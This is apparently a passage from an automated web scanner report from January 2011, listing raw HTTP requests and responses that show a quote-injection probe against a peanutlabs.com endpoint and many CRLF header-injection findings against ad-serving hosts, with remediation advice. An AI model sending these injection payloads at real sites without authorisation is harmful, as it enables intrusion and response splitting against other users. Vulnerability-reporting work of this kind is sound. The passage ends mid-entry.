GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding Content-Length: 42 Connection: close Content-Type: text/plain
XML-RPC server accepts POST requests only.
2. HTTP header injectionpreviousnext There are 29 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/586bb 9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29: Date: Sun, 09 Jan 2011 02:03:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3913f 3c0a349169b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:08 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1e05c%0d%0a76a123a846/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1e05c 76a123a846/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632: Date: Sun, 09 Jan 2011 02:03:09 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6a67f 245da988542/scrabble.pogo/load: Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6c29f 119f9246290/scrabble.pogo/room%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D326364: Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5f927%0d%0a372c17095f9/N5621.148484.0233710364621/B4682144 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5f927 372c17095f9/N5621.148484.0233710364621/B4682144: Date: Sun, 09 Jan 2011 02:03:16 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2379a cb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http: //r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn%3D64 Date: Sun, 09 Jan 2011 02:03:04 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31153 afba1dd703b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:02:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1329b 901e1fb73e9/home.pogo/spotlight: Date: Sun, 09 Jan 2011 02:02:57 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1ee0e%0d%0a014a1f82eea/pand.default/prod.backstage HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1ee0e 014a1f82eea/pand.default/prod.backstage: Date: Sun, 09 Jan 2011 02:02:52 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /11083%0d%0a8a9bf6293f5/pand.default/prod.community;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=728x90;tile=1;ord=1294536983566535667 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536983566535667&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/11083 8a9bf6293f5/pand.default/prod.community%3Bag%3D0%3Bgnd%3D0%3Bhours%3D0%3Bcomped%3D0%3Bfb%3D0%3Bdma%3D0%3Bclean%3D0%3Bspgs%3D0%3Bu%3Dag%2A0%21gnd%2A0%21hours%2A0%21comped%2A0%21fb%2A0%21dma%2A0%21clean%2A0%21spgs%2A0%3Bsz%3D728x90%3Btile%3D1%3Bord%3D1294536983566535667: Date: Sun, 09 Jan 2011 02:01:35 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31be3 d74a84518d3/prize.pogo/prizes%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D780687: Date: Sun, 09 Jan 2011 02:02:08 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8b770 b65cef34867/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319: Date: Sun, 09 Jan 2011 02:02:16 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4a418 c5139b784f3/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/12804 48b5790cf88/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/13037 fced369b2cc/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/556e1 2fda3d0e5cf/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632: Date: Sun, 09 Jan 2011 02:03:25 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/66506 cee2014b2d9/prize.pogo/prizes: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/79e85 73d9c50a5a7/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319: Date: Sun, 09 Jan 2011 02:03:35 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/877c2 03fa4dd3a61/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/64dc6 e88543e460e/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0%0d%0a6b6ad7cf9b8; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e%0d%0a91a63bf7646; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=73be8%0d%0adc5e96035d9&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=729cd%0d%0a9fe4d8fa7d8 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=92f47%0d%0a539632693e7&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
